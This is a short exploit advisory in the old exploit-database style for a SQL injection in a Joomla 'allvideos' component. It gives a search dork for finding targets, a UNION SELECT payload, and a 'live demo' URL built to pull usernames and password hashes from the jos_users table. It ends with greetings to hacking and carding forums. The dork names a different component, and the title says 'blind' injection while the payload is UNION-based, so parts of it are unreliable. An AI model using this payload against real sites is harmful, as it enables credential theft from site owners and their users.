# Exploit Title: joomla component allvideos BLIND SQL injection Vulnerability # Date: 09 april 2010 # Author: bumble_be # Software Link: N/A # Tested on: Windows XP 2 ====================================================================== [x] author : bumble_be (iogi89@ymail.com) [x] dork : inurl:option=com_huruhelpdesk [x] myweb : http://linggau-haxor.com ====================================================================== ==== SQLI EXPLOIT ==== /**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12-- ==== VULN IN HERE ==== http://localhost/xampp/joomla/index.php?option=com_allvideos&id=1339[c0de] ==== LIVE DEMO ==== http://localhost/xampp/joomla/index.php?option=com_allvideos&id=1339/**/AND/**/1=2/**/UNION+SELECT/**/1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12+from+jos_users-- [x]------------------------------------------------------------------- GREETZ TO WE FORUM: DEVILZC0DE.ORG / INDONESIANHACKER.ORG / HACKER-NEWBIE.ORG / PALEMBANGHACKERLINK.ORG / YOGYACARDERLINK.WEB.ID [x]------------------------------------------------------------------- MY BROTHA : mywisdom,whitehat spykid, chaer.newbie, flyff666 , revres tanur , kiddies, petimati, ketek, syntax_error, system_rt0, suddent_death, eidelweiss , Aaezha, ichito-bandito, kamtiEz, r3m1ck, otong, 3xpL0it, bl4ck_sh4d0w, demnas, RxN and all crew indonesia hacker :) [x]------------------------------------------------------------------- note :mulailah sesuatu dengan ucapan bissmillah [X]------------------------------------------------------------------- INDONESIA STILL UP AND WE NOT DEAD :0